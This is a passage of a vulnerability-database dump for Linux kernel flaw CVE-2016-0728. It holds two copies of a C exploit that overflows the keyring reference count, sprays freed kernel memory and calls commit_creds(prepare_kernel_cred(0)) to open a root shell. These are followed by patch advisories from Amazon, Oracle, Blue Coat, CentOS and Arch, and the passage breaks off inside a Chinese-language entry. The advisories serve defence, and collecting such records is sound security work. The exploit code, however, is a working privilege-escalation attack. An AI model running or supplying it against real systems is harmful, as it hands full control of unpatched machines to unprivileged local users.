{\n fprintf(stdout, \"[+] Resolved %s to %p\\n\", name, (void *)addr);\n fclose(f);\n return addr;\n }\n }\n\n fclose(f);\n return 0;\n}\n\nvoid userspace_revoke(void * key) {\n commit_creds(prepare_kernel_cred(0));\n}\n\nint main(int argc, const char *argv[]) {\n const char *keyring_name;\n size_t i = 0;\n unsigned long int l = 0x100000000/2;\n key_serial_t serial = -1;\n pid_t pid = -1;\n struct key_type * my_key_type = NULL;\n\n struct {\n long mtype;\n char mtext[STRUCT_LEN];\n } msg = {0x4141414141414141, {0}};\n int msqid;\n\n if (argc != 2) {\n puts(\"usage: ./keys <key_name>\");\n return 1;\n }\n\n printf(\"[+] uid=%d, euid=%d\\n\", getuid(), geteuid());\n commit_creds = (_commit_creds)get_kernel_sym(\"commit_creds\");\n prepare_kernel_cred = (_prepare_kernel_cred)get_kernel_sym(\"prepare_kernel_cred\");\n if(commit_creds == NULL || prepare_kernel_cred == NULL) {\n commit_creds = (_commit_creds)COMMIT_CREDS_ADDR;\n prepare_kernel_cred = (_prepare_kernel_cred)PREPARE_KERNEL_CREDS_ADDR;\n if(commit_creds == (_commit_creds)0xffffffff810bb050 || prepare_kernel_cred == (_prepare_kernel_cred)0xffffffff810bb370)\n puts(\"[-] You probably need to change the address of commit_creds and prepare_kernel_cred in source\");\n }\n\n my_key_type = malloc(sizeof(*my_key_type));\n\n my_key_type->revoke = (void*)userspace_revoke;\n memset(msg.mtext, 'A', sizeof(msg.mtext));\n\n // key->uid\n *(int*)(&msg.mtext[56]) = 0x3e8; /* geteuid() */\n //key->perm\n *(int*)(&msg.mtext[64]) = 0x3f3f3f3f;\n\n //key->type\n *(unsigned long *)(&msg.mtext[80]) = (unsigned long)my_key_type;\n\n if ((msqid = msgget(IPC_PRIVATE, 0644 | IPC_CREAT)) == -1) {\n perror(\"msgget\");\n exit(1);\n }\n\n keyring_name = argv[1];\n\n /* Set the new session keyring before we start */\n\n serial = keyctl(KEYCTL_JOIN_SESSION_KEYRING, keyring_name);\n if (serial < 0) {\n perror(\"keyctl\");\n return -1;\n }\n\n if (keyctl(KEYCTL_SETPERM, serial, KEY_POS_ALL | KEY_USR_ALL | KEY_GRP_ALL | KEY_OTH_ALL) < 0) {\n perror(\"keyctl\");\n return -1;\n }\n\n\n puts(\"[+] Increfing...\");\n for (i = 1; i < 0xfffffffd; i++) {\n if (i == (0xffffffff - l)) {\n l = l/2;\n sleep(5);\n }\n if (keyctl(KEYCTL_JOIN_SESSION_KEYRING, keyring_name) < 0) {\n perror(\"[-] keyctl\");\n return -1;\n }\n }\n sleep(5);\n /* here we are going to leak the last references to overflow */\n for (i=0; i<5; ++i) {\n if (keyctl(KEYCTL_JOIN_SESSION_KEYRING, keyring_name) < 0) {\n perror(\"[-] keyctl\");\n return -1;\n }\n }\n\n puts(\"[+] Finished increfing\");\n puts(\"[+] Forking...\");\n /* allocate msg struct in the kernel rewriting the freed keyring object */\n for (i=0; i<64; i++) {\n pid = fork();\n if (pid == -1) {\n perror(\"[-] fork\");\n return -1;\n }\n\n if (pid == 0) {\n sleep(2);\n if ((msqid = msgget(IPC_PRIVATE, 0644 | IPC_CREAT)) == -1) {\n perror(\"[-] msgget\");\n exit(1);\n }\n for (i = 0; i < 64; i++) {\n if (msgsnd(msqid, &msg, sizeof(msg.mtext), 0) == -1) {\n perror(\"[-] msgsnd\");\n exit(1);\n }\n }\n sleep(-1);\n exit(1);\n }\n }\n\n puts(\"[+] Finished forking\");\n sleep(5);\n\n /* call userspace_revoke from kernel */\n puts(\"[+] Caling revoke...\");\n if (keyctl(KEYCTL_REVOKE, KEY_SPEC_SESSION_KEYRING) == -1) {\n perror(\"[+] keyctl_revoke\");\n }\n\n printf(\"uid=%d, euid=%d\\n\", getuid(), geteuid());\n execl(\"/bin/sh\", \"/bin/sh\", NULL);\n\n return 0;\n}", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-04-01T19:04:28", "description": "\nLinux Kernel 4.4.1 - REFCOUNT Overflow Use-After-Free in Keyrings Local Privilege Escalation (1)", "edition": 1, "published": "2016-01-19T00:00:00", "title": "Linux Kernel 4.4.1 - REFCOUNT Overflow Use-After-Free in Keyrings Local Privilege Escalation (1)", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-0728"], "modified": "2016-01-19T00:00:00", "id": "EXPLOITPACK:4CC02E891FC223E9BA1344151AC6958F", "href": "", "sourceData": "/*\n# Exploit Title: Linux kernel REFCOUNT overflow/Use-After-Free in keyrings\n# Date: 19/1/2016\n# Exploit Author: Perception Point Team\n# CVE : CVE-2016-0728\n*/\n\n/* $ gcc cve_2016_0728.c -o cve_2016_0728 -lkeyutils -Wall */\n/* $ ./cve_2016_072 PP_KEY */\n\n/* EDB-Note: More information ~ http://perception-point.io/2016/01/14/analysis-and-exploitation-of-a-linux-kernel-vulnerability-cve-2016-0728/ */\n\n#include <stdio.h>\n#include <stdlib.h>\n#include <string.h>\n#include <sys/types.h>\n#include <keyutils.h>\n#include <unistd.h>\n#include <time.h>\n#include <unistd.h>\n\n#include <sys/ipc.h>\n#include <sys/msg.h>\n\ntypedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);\ntypedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);\n_commit_creds commit_creds;\n_prepare_kernel_cred prepare_kernel_cred;\n\n#define STRUCT_LEN (0xb8 - 0x30)\n#define COMMIT_CREDS_ADDR (0xffffffff81094250)\n#define PREPARE_KERNEL_CREDS_ADDR (0xffffffff81094550)\n\n\n\nstruct key_type {\n char * name;\n size_t datalen;\n void * vet_description;\n void * preparse;\n void * free_preparse;\n void * instantiate;\n void * update;\n void * match_preparse;\n void * match_free;\n void * revoke;\n void * destroy;\n};\n\nvoid userspace_revoke(void * key) {\n commit_creds(prepare_kernel_cred(0));\n}\n\nint main(int argc, const char *argv[]) {\n\tconst char *keyring_name;\n\tsize_t i = 0;\n unsigned long int l = 0x100000000/2;\n\tkey_serial_t serial = -1;\n\tpid_t pid = -1;\n struct key_type * my_key_type = NULL;\n \nstruct { long mtype;\n\t\tchar mtext[STRUCT_LEN];\n\t} msg = {0x4141414141414141, {0}};\n\tint msqid;\n\n\tif (argc != 2) {\n\t\tputs(\"usage: ./keys <key_name>\");\n\t\treturn 1;\n\t}\n\n printf(\"uid=%d, euid=%d\\n\", getuid(), geteuid()); \n commit_creds = (_commit_creds) COMMIT_CREDS_ADDR;\n prepare_kernel_cred = (_prepare_kernel_cred) PREPARE_KERNEL_CREDS_ADDR;\n \n my_key_type = malloc(sizeof(*my_key_type));\n\n my_key_type->revoke = (void*)userspace_revoke;\n memset(msg.mtext, 'A', sizeof(msg.mtext));\n\n // key->uid\n *(int*)(&msg.mtext[56]) = 0x3e8; /* geteuid() */\n //key->perm\n *(int*)(&msg.mtext[64]) = 0x3f3f3f3f;\n\n //key->type\n *(unsigned long *)(&msg.mtext[80]) = (unsigned long)my_key_type;\n\n if ((msqid = msgget(IPC_PRIVATE, 0644 | IPC_CREAT)) == -1) {\n perror(\"msgget\");\n exit(1);\n }\n\n keyring_name = argv[1];\n\n\t/* Set the new session keyring before we start */\n\n\tserial = keyctl(KEYCTL_JOIN_SESSION_KEYRING, keyring_name);\n\tif (serial < 0) {\n\t\tperror(\"keyctl\");\n\t\treturn -1;\n }\n\t\n\tif (keyctl(KEYCTL_SETPERM, serial, KEY_POS_ALL | KEY_USR_ALL | KEY_GRP_ALL | KEY_OTH_ALL) < 0) {\n\t\tperror(\"keyctl\");\n\t\treturn -1;\n\t}\n\n\n\tputs(\"Increfing...\");\n for (i = 1; i < 0xfffffffd; i++) {\n if (i == (0xffffffff - l)) {\n l = l/2;\n sleep(5);\n }\n if (keyctl(KEYCTL_JOIN_SESSION_KEYRING, keyring_name) < 0) {\n perror(\"keyctl\");\n return -1;\n }\n }\n sleep(5);\n /* here we are going to leak the last references to overflow */\n for (i=0; i<5; ++i) {\n if (keyctl(KEYCTL_JOIN_SESSION_KEYRING, keyring_name) < 0) {\n perror(\"keyctl\");\n return -1;\n }\n }\n\n puts(\"finished increfing\");\n puts(\"forking...\");\n /* allocate msg struct in the kernel rewriting the freed keyring object */\n for (i=0; i<64; i++) {\n pid = fork();\n if (pid == -1) {\n perror(\"fork\");\n return -1;\n }\n\n if (pid == 0) {\n sleep(2);\n if ((msqid = msgget(IPC_PRIVATE, 0644 | IPC_CREAT)) == -1) {\n perror(\"msgget\");\n exit(1);\n }\n for (i = 0; i < 64; i++) {\n if (msgsnd(msqid, &msg, sizeof(msg.mtext), 0) == -1) {\n perror(\"msgsnd\");\n exit(1);\n }\n }\n sleep(-1);\n exit(1);\n }\n }\n \n puts(\"finished forking\");\n sleep(5);\n\n /* call userspace_revoke from kernel */\n puts(\"caling revoke...\");\n if (keyctl(KEYCTL_REVOKE, KEY_SPEC_SESSION_KEYRING) == -1) {\n perror(\"keyctl_revoke\");\n }\n\n printf(\"uid=%d, euid=%d\\n\", getuid(), geteuid());\n execl(\"/bin/sh\", \"/bin/sh\", NULL);\n\n return 0;\n}", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "amazon": [{"lastseen": "2020-11-10T12:35:24", "bulletinFamily": "unix", "cvelist": ["CVE-2016-0728"], "description": "**Issue Overview:**\n\nPerception Point Research [identified](<http://perception-point.io/2016/01/14/analysis-and-exploitation-of-a-linux-kernel-vulnerability-cve-2016-0728/>) a use-after-free vulnerability, representing a local privilege escalation vulnerability in the Linux kernel. Their post contains a detailed analysis of the bug.\n\nkernel-4.1.13-19.30.amzn1 and earlier versions are impacted.\n\n \n**Affected Packages:** \n\n\nkernel\n\n \n**Issue Correction:** \nRun _yum clean all_ followed by _yum update kernel_ to update your system. You will need to reboot your system in order for the new kernel to be running.\n\n \n\n\n**New Packages:**\n \n \n i686: \n kernel-tools-debuginfo-4.1.13-19.31.amzn1.i686 \n kernel-devel-4.1.13-19.31.amzn1.i686 \n kernel-headers-4.1.13-19.31.amzn1.i686 \n perf-debuginfo-4.1.13-19.31.amzn1.i686 \n kernel-tools-4.1.13-19.31.amzn1.i686 \n kernel-4.1.13-19.31.amzn1.i686 \n kernel-tools-devel-4.1.13-19.31.amzn1.i686 \n perf-4.1.13-19.31.amzn1.i686 \n kernel-debuginfo-common-i686-4.1.13-19.31.amzn1.i686 \n kernel-debuginfo-4.1.13-19.31.amzn1.i686 \n \n noarch: \n kernel-doc-4.1.13-19.31.amzn1.noarch \n \n src: \n kernel-4.1.13-19.31.amzn1.src \n \n x86_64: \n kernel-tools-4.1.13-19.31.amzn1.x86_64 \n perf-debuginfo-4.1.13-19.31.amzn1.x86_64 \n kernel-headers-4.1.13-19.31.amzn1.x86_64 \n kernel-tools-devel-4.1.13-19.31.amzn1.x86_64 \n kernel-debuginfo-common-x86_64-4.1.13-19.31.amzn1.x86_64 \n kernel-tools-debuginfo-4.1.13-19.31.amzn1.x86_64 \n kernel-debuginfo-4.1.13-19.31.amzn1.x86_64 \n kernel-4.1.13-19.31.amzn1.x86_64 \n kernel-devel-4.1.13-19.31.amzn1.x86_64 \n perf-4.1.13-19.31.amzn1.x86_64 \n \n \n", "edition": 4, "modified": "2016-01-19T17:07:00", "published": "2016-01-19T17:07:00", "id": "ALAS-2016-642", "href": "https://alas.aws.amazon.com/ALAS-2016-642.html", "title": "Medium: kernel", "type": "amazon", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "oraclelinux": [{"lastseen": "2019-05-29T18:36:01", "bulletinFamily": "unix", "cvelist": ["CVE-2016-0728"], "description": "kernel-uek\n[4.1.12-32.1.2]\n- KEYS: Fix keyring ref leak in join_session_keyring() (Yevgeny Pats) [Orabug: 22563965] {CVE-2016-0728}\n[4.1.12-32.1.1]\n- ocfs2: return non-zero st_blocks for inline data (John Haxby) [Orabug: 22218243] \n- xen/events/fifo: Consume unprocessed events when a CPU dies (Ross Lagerwall) [Orabug: 22498877] \n- Revert 'xen/fb: allow xenfb initialization for hvm guests' (Konrad Rzeszutek Wilk) \n- xen/pciback: Dont allow MSI-X ops if PCI_COMMAND_MEMORY is not set. (Konrad Rzeszutek Wilk) \n- xen/pciback: For XEN_PCI_OP_disable_msi[|x] only disable if device has MSI(X) enabled. (Konrad Rzeszutek Wilk) \n- xen/pciback: Do not install an IRQ handler for MSI interrupts. (Konrad Rzeszutek Wilk) \n- xen/pciback: Return error on XEN_PCI_OP_enable_msix when device has MSI or MSI-X enabled (Konrad Rzeszutek Wilk) \n- xen/pciback: Return error on XEN_PCI_OP_enable_msi when device has MSI or MSI-X enabled (Konrad Rzeszutek Wilk) \n- xen/pciback: Save xen_pci_op commands before processing it (Konrad Rzeszutek Wilk) \n- xen-scsiback: safely copy requests (David Vrabel) \n- xen-blkback: read from indirect descriptors only once (Roger Pau Monne) \n- xen-blkback: only read request operation from shared ring once (Roger Pau Monne) \n- xen-netback: use RING_COPY_REQUEST() throughout (David Vrabel) \n- xen-netback: dont use last request to determine minimum Tx credit (David Vrabel) \n- xen: Add RING_COPY_REQUEST() (David Vrabel)", "edition": 4, "modified": "2016-01-20T00:00:00", "published": "2016-01-20T00:00:00", "id": "ELSA-2016-3510", "href": "http://linux.oracle.com/errata/ELSA-2016-3510.html", "title": "kernel-uek security update", "type": "oraclelinux", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:36:58", "bulletinFamily": "unix", "cvelist": ["CVE-2016-0728"], "description": "[3.10.0-327.4.5.OL7]\n- Oracle Linux certificates (Alexey Petrenko)\n[3.10.0-327.4.5]\n- [security] keys: Fix keyring ref leak in join_session_keyring() (David Howells) [1298931 1298036] {CVE-2016-0728}", "edition": 4, "modified": "2016-01-25T00:00:00", "published": "2016-01-25T00:00:00", "id": "ELSA-2016-0064", "href": "http://linux.oracle.com/errata/ELSA-2016-0064.html", "title": "kernel security update", "type": "oraclelinux", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:35:59", "bulletinFamily": "unix", "cvelist": ["CVE-2016-0728"], "description": "kernel-uek\n[3.8.13-118.2.5]\n- KEYS: Fix keyring ref leak in join_session_keyring() (Yevgeny Pats) [Orabug: 22563965] {CVE-2016-0728}", "edition": 4, "modified": "2016-01-20T00:00:00", "published": "2016-01-20T00:00:00", "id": "ELSA-2016-3509", "href": "http://linux.oracle.com/errata/ELSA-2016-3509.html", "title": "Unbreakable Enterprise kernel security update", "type": "oraclelinux", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:38:47", "bulletinFamily": "unix", "cvelist": ["CVE-2015-7872", "CVE-2016-0728", "CVE-2015-5157"], "description": "- [3.10.0-327.10.1.OL7]\n- Oracle Linux certificates (Alexey Petrenko)\n[3.10.0-327.10.1]\n- [of] return NUMA_NO_NODE from fallback of_node_to_nid() (Thadeu Lima de Souza Cascardo) [1300614 1294398]\n- [net] openvswitch: do not allocate memory from offline numa node (Thadeu Lima de Souza Cascardo) [1300614 1294398]\n[3.10.0-327.9.1]\n- [security] keys: Fix keyring ref leak in join_session_keyring() (David Howells) [1298931 1298036] {CVE-2016-0728}\n[3.10.0-327.8.1]\n- [md] dm: fix AB-BA deadlock in __dm_destroy() (Mike Snitzer) [1296566 1292481]\n- [md] revert 'dm-mpath: fix stalls when handling invalid ioctls' (Mike Snitzer) [1287552 1277194]\n- [cpufreq] intel_pstate: Fix limits->max_perf rounding error (Prarit Bhargava) [1296276 1279617]\n- [cpufreq] intel_pstate: Fix limits->max_policy_pct rounding error (Prarit Bhargava) [1296276 1279617]\n- [cpufreq] revert 'intel_pstate: fix rounding error in max_freq_pct' (Prarit Bhargava) [1296276 1279617]\n- [crypto] nx: 842 - Add CRC and validation support (Gustavo Duarte) [1289451 1264905]\n- [powerpc] eeh: More relaxed condition for enabled IO path (Steve Best) [1289101 1274731]\n- [security] keys: Don't permit request_key() to construct a new keyring (David Howells) [1275929 1273465] {CVE-2015-7872}\n- [security] keys: Fix crash when attempt to garbage collect an uninstantiated keyring (David Howells) [1275929 1273465] {CVE-2015-7872}\n- [security] keys: Fix race between key destruction and finding a keyring by name (David Howells) [1275929 1273465] {CVE-2015-7872}\n- [x86] paravirt: Replace the paravirt nop with a bona fide empty function (Mateusz Guzik) [1259582 1259583] {CVE-2015-5157}\n- [x86] nmi: Fix a paravirt stack-clobbering bug in the NMI code (Mateusz Guzik) [1259582 1259583] {CVE-2015-5157}\n- [x86] nmi: Use DF to avoid userspace RSP confusing nested NMI detection (Mateusz Guzik) [1259582 1259583] {CVE-2015-5157}\n- [x86] nmi: Reorder nested NMI checks (Mateusz Guzik) [1259582 1259583] {CVE-2015-5157}\n- [x86] nmi: Improve nested NMI comments (Mateusz Guzik) [1259582 1259583] {CVE-2015-5157}\n- [x86] nmi: Switch stacks on userspace NMI entry (Mateusz Guzik) [1259582 1259583] {CVE-2015-5157}\n[3.10.0-327.7.1]\n- [scsi] scsi_sysfs: protect against double execution of __scsi_remove_device() (Vitaly Kuznetsov) [1292075 1273723]\n- [powerpc] mm: Recompute hash value after a failed update (Gustavo Duarte) [1289452 1264920]\n- [misc] genwqe: get rid of atomic allocations (Hendrik Brueckner) [1289450 1270244]\n- [mm] use only per-device readahead limit (Eric Sandeen) [1287550 1280355]\n- [net] ipv6: update ip6_rt_last_gc every time GC is run (Hannes Frederic Sowa) [1285370 1270092]\n- [kernel] tick: broadcast: Prevent livelock from event handler (Prarit Bhargava) [1284043 1265283]\n- [kernel] clockevents: Serialize calls to clockevents_update_freq() in the core (Prarit Bhargava) [1284043 1265283]\n[3.10.0-327.6.1]\n- [netdrv] bonding: propagate LRO disable to slave devices (Jarod Wilson) [1292072 1266578]\n[3.10.0-327.5.1]\n- [net] vsock: Fix lockdep issue (Dave Anderson) [1292372 1253971]\n- [net] vsock: sock_put wasn't safe to call in interrupt context (Dave Anderson) [1292372 1253971]", "edition": 4, "modified": "2016-02-16T00:00:00", "published": "2016-02-16T00:00:00", "id": "ELSA-2016-0185", "href": "http://linux.oracle.com/errata/ELSA-2016-0185.html", "title": "kernel security and bug fix update", "type": "oraclelinux", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "symantec": [{"lastseen": "2020-12-24T10:41:40", "bulletinFamily": "software", "cvelist": ["CVE-2016-0728"], "description": "### SUMMARY\n\nBlue Coat products that include affected versions of the Linux kernel and provide means for executing arbitrary code are susceptible to a privilege escalation vulnerability. A malicious local unprivileged user can exploit this vulnerability to escalate their privileges on the system or cause denial of service. \n \n\n\n### AFFECTED PRODUCTS\n\n**Malware Analysis (MA)** \n--- \n**CVE** | **Affected Version(s)** | **Remediation** \nCVE-2016-0728 | 4.2 | Upgrade to 4.2.9. \n \n \n\n**Norman Shark Industrial Control System Protection (ICSP)** \n--- \n**CVE** | **Affected Version(s)** | **Remediation** \nCVE-2016-0728 | 5.4 | Not vulnerable, fixed in 5.4.1 \n5.3 | Upgrade to 5.3.6. \n \n \n\n**Norman Shark Network Protection (NNP)** \n--- \n**CVE** | **Affected Version(s)** | **Remediation** \nCVE-2016-0728 | 5.3 | Upgrade to 5.3.6. \n \n \n\n**Norman Shark SCADA Protection (NSP)** \n--- \n**CVE** | **Affected Version(s)** | **Remediation** \nCVE-2016-0728 | 5.3 | Upgrade to 5.3.6. \n \n \nThe following products have a vulnerable version of the Linux kernel, but are not vulnerable to known vectors of attack:\n\n**Advanced Secure Gateway (ASG)** \n--- \n**CVE** | **Affected Version(s)** | **Remediation** \nCVE-2016-0728 \n | 6.7 and later | Not vulnerable, fixed in 6.7.2.1 \n6.6 | Upgrade to 6.6.5.1. \n \n \n\n**Content Analysis System (CAS)** \n--- \n**CVE** | **Affected Version(s)** | **Remediation** \n CVE-2016-0728 \n \n | 2.1 and later | Not vulnerable, fixed in 2.1.1.1 \n1.3 | Upgrade to 1.3.7.1. \n1.2 | Upgrade to later releases with fixes. \n \n \n\n**Mail Threat Defense (MTD)** \n--- \n**CVE** | **Affected Version(s)** | **Remediation** \nCVE-2016-0728 | 1.1 | Not available at this time \n \n \n\n**Management Center (MC)** \n--- \n**CVE** | **Affected Version(s)** | **Remediation** \nCVE-2016-0728 \n | 1.7 and later | Not vulnerable, fixed in 1.7.1.2. \n1.6 | Upgrade to later releases with fixes. \n1.5 | Upgrade to later releases with fixes. \n \n \n\n**Reporter** \n--- \n**CVE** | **Affected Version(s)** | **Remediation** \nCVE-2016-0728 | 10.2 and later | Not vulnerable, fixed in 10.2.1.1 \n10.1 | Upgrade to 10.1.4.2. \n \n \n\n**SSL Visibility (SSLV)** \n--- \n**CVE** | **Affected Version(s)** | **Remediation** \nCVE-2016-0728 \n \n \n | 3.10 and later | Not vulnerable, fixed in 3.10.1.1 \n3.9 | Upgrade to 3.9.4.1. \n3.8.4FC | Upgrade to later releases with fixes. \n3.8 | Upgrade to later releases with fixes. \n \n### \nADDITIONAL PRODUCT INFORMATION\n\nA Blue Coat product does not need to use the Linux keyring facility in order to be vulnerable. A malicious local unprivileged user can execute arbitrary code that uses the keyctl() system call to exploit the vulnerability and gain escalated privileges on the system or cause denial of service. A remote attacker has to either have shell access on the target system, or force the target system to execute arbitrary code to exploit this vulnerability.\n\nBlue Coat products that use a native installation of the Linux kernel but do not install or maintain the kernel are not vulnerable to this attack. However, the underlying platform that installs and maintains the Linux kernel may be vulnerable. Blue Coat urges our customers to update the versions of the Linux kernel that are natively installed for Client Connector, ProxyClient, and Reporter 9.x for Linux.\n\nBlue Coat products that do not provide Linux shell access and do not execute arbitrary code from untrusted sources are not known to be vulnerable to this attack. However, vulnerability fixes will be included in the patches that are provided. The following products include vulnerable versions of the Linux kernel, but do not provide Linux shell access, do not execute arbitrary code from untrusted sources, and are not known to be vulnerable:\n\n * **ASG**\n * **CAS**\n * **MTD**\n * **MC**\n * **Reporter 10.1**\n * **SSLV**\n\nThe following products are not vulnerable: \n**Android Mobile Agent \nAuthConnector \nBCAAA \nBlue Coat HSM Agent for the Luna SP \nCacheFlow \nClient Connector \nCloud Data Protection for Salesforce \nCloud Data Protection for Salesforce Analytics \nCloud Data Protection for ServiceNow \nCloud Data Protection for Oracle CRM On Demand \nCloud Data Protection for Oracle Field Service Cloud \nCloud Data Protection for Oracle Sales Cloud \nCloud Data Protection Integration Server \nCloud Data Protection Communication Server \nCloud Data Protection Policy Builder \nDirector \nGeneral Auth Connector Login Application \nIntelligenceCenter \nIntelligenceCenter Data Collector \nK9 \nPacketShaper \nPacketShaper S-Series \nPolicyCenter \nPolicyCenter S-Series \nProxyAV \nProxyAV ConLog and ConLogXP \nProxyClient \nProxySG \nSecurity Analytics \nUnified Agent \nWeb Isolation \nX-Series XOS**\n\nBlue Coat no longer provides vulnerability information for the following products:\n\n**DLP** \nPlease, contact Digital Guardian technical support regarding vulnerability information for DLP. \n \n\n\n### ISSUES\n\nThis Security Advisory addresses a privilege escalation vulnerability in the Linux kernel (CVE-2016-0728). A malicious local unprivileged user can exploit a reference leak and use-after-free flaw in the Linux kernel keyring facility. The malicious user can exploit the leaked keyring reference to cause the Linux kernel to execute arbitrary code, resulting in privilege escalation or denial of service.\n\nThe Linux kernel keyring facility is a mechanism for Linux drivers to cache authentication keys, encryption keys, and other security-related objects in the Linux kernel. Linux provides a system call interface, including a keyctl() system call, for userspace applications to manage the kernel objects and also use the keyring facility for their own purposes. \n\n**CVE-2016-0728\u200b** \n--- \n**Severity / CVSSv2** | High / 7.2 (AV:L/AC:L/Au:N/C:C/I:C/A:C) \n**References** | SecurityFocus: [BID 81054](<https://www.securityfocus.com/bid/81054>) / NVD: [CVE-2016-0728](<https://nvd.nist.gov/vuln/detail/CVE-2016-0728>) \n**Impact** | Privilege escalation \n**Description** | Blue Coat products that include affected versions of the Linux kernel and provide means for executing arbitrary code are susceptible to a privilege escalation vulnerability. \n \n### \nREFERENCES\n\nAnalysis and Exploitation of a Linux Kernel Vulnerability (from Perception Point) - <https://perception-point.io/2016/01/14/analysis-and-exploitation-of-a-linux-kernel-vulnerability-cve-2016-0728/>\n\n \n\n### REVISION\n\n2020-04-20 Advisory status moved to Closed. \n2019-10-03 Web Isolation is not vulnerable. \n2018-09-24 A fix for SSLV 3.8.4FC will not be provided. Please upgrade to a later version with the vulnerability fixes. \n2017-11-06 ASG 6.7 is not vulnerable. \n2017-08-02 SSLV 4.1 is not vulnerable. \n2017-07-20 MC 1.10 is not vulnerable. \n2017-05-17 CAS 2.1 is not vulnerable. \n2017-03-30 MC 1.9 is not vulnerable. \n2017-03-06 MC 1.8 is not vulnerable. ProxySG 6.7 is not vulnerable. SSLV 4.0 is not vulnerable. Vulnerability inquiries for DLP should be addressed to Digital Guardian technical support. \n2016-12-04 SSLV 3.11 is not vulnerable. \n2016-11-17 Cloud Data Protection for Oracle Field Service Cloud is not vulnerable. \n2016-11-11 SSLV 3.10 is not vulnerable. \n2016-11-04 A fix for ASG is available in 6.6.5.1. A fix for Reporter 10.1 is available in 10.1.4.2. \n2016-10-25 MC 1.6 has a vulnerable version of the Linux kernel, but is not vulnerable to known vectors of attack. MC 1.7 is not vulnerable because it contains the vulnerability fix. \n2016-08-12 A fix for CAS 1.3 is available in 1.3.7.1. \n2016-08-10 A fix for SSLV 3.9 is available in 3.9.4.1. \n2016-06-13 Fixes for ICSP, NNP, and NSP are available in 5.3.6. \n2016-06-03 A fix for MAA is available in 4.2.9. \n2016-05-12 A fix for SSLV 3.8 will not be provided. Please upgrade to a later version with the vulnerability fixes. \n2016-05-11 No Cloud Data Protection products are vulnerable. \n2016-04-25 MTD 1.1 has a vulnerable version of the Linux kernel, but is not vulnerable to known vectors of attack. \n2016-04-15 A fix will not be provided for CAS 1.2. Please upgrade to a later version with the vulnerability fixes. \n2016-02-25 initial public release\n", "modified": "2020-04-21T03:57:57", "published": "2016-02-25T08:00:00", "id": "SMNTC-1349", "href": "", "type": "symantec", "title": "SA112 : Linux Kernel Keyring Privilege Escalation", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "centos": [{"lastseen": "2019-12-20T18:27:06", "bulletinFamily": "unix", "cvelist": ["CVE-2016-0728"], "description": "**CentOS Errata and Security Advisory** CESA-2016:0064\n\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\n* A use-after-free flaw was found in the way the Linux kernel's key\nmanagement subsystem handled keyring object reference counting in certain\nerror path of the join_session_keyring() function. A local, unprivileged\nuser could use this flaw to escalate their privileges on the system.\n(CVE-2016-0728, Important)\n\nRed Hat would like to thank the Perception Point research team for\nreporting this issue.\n\nAll kernel users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue. The system must be\nrebooted for this update to take effect.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2016-January/033663.html\n\n**Affected packages:**\nkernel\nkernel-abi-whitelists\nkernel-debug\nkernel-debug-devel\nkernel-devel\nkernel-doc\nkernel-headers\nkernel-tools\nkernel-tools-libs\nkernel-tools-libs-devel\nperf\npython-perf\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2016-0064.html", "edition": 3, "modified": "2016-01-26T02:08:06", "published": "2016-01-26T02:08:06", "href": "http://lists.centos.org/pipermail/centos-announce/2016-January/033663.html", "id": "CESA-2016:0064", "title": "kernel, perf, python security update", "type": "centos", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "archlinux": [{"lastseen": "2016-09-02T18:44:41", "bulletinFamily": "unix", "cvelist": ["CVE-2016-0728"], "description": "It was reported that possible use-after-free vulnerability in keyring\nfacility, possibly leading to local privilege escalation, was found.\nFunction join_session_keyring in security/keys/process_keys.c holds a\nreference to the requested keyring, but if that keyring is the same as\nthe one being currently used by the process, the kernel wouldn't\ndecrease keyring->usage before returning to userspace. The usage field\ncan be possibly overflowed causing use-after-free on the keyring object.", "modified": "2016-01-25T00:00:00", "published": "2016-01-25T00:00:00", "id": "ASA-201601-26", "href": "https://lists.archlinux.org/pipermail/arch-security/2016-January/000531.html", "type": "archlinux", "title": "linux-lts: privilege escalation", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-02T18:44:44", "bulletinFamily": "unix", "cvelist": ["CVE-2016-0728"], "description": "It was reported that possible use-after-free vulnerability in keyring\nfacility, possibly leading to local privilege escalation, was found.\nFunction join_session_keyring in security/keys/process_keys.c holds a\nreference to the requested keyring, but if that keyring is the same as\nthe one being currently used by the process, the kernel wouldn't\ndecrease keyring->usage before returning to userspace. The usage field\ncan be possibly overflowed causing use-after-free on the keyring object.", "modified": "2016-01-20T00:00:00", "published": "2016-01-20T00:00:00", "id": "ASA-201601-20", "href": "https://lists.archlinux.org/pipermail/arch-security/2016-January/000525.html", "type": "archlinux", "title": "linux: privilege escalation", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "seebug": [{"lastseen": "2017-11-19T12:10:49", "description": "### \u6f0f\u6d1e\u5206\u6790\r\n\r\n\r\nLinux Kernel\u7684\u8fd9\u4e2a\u6f0f\u6d1e\u4f1a\u9020\u6210\u4e24\u4e2a\u5f71\u54cd\uff0c\u7b2c\u4e00\u4e2a\u662f\u9020\u6210\u4fe1\u606f\u6cc4\u9732\uff0c\u53ef\u4ee5bypass 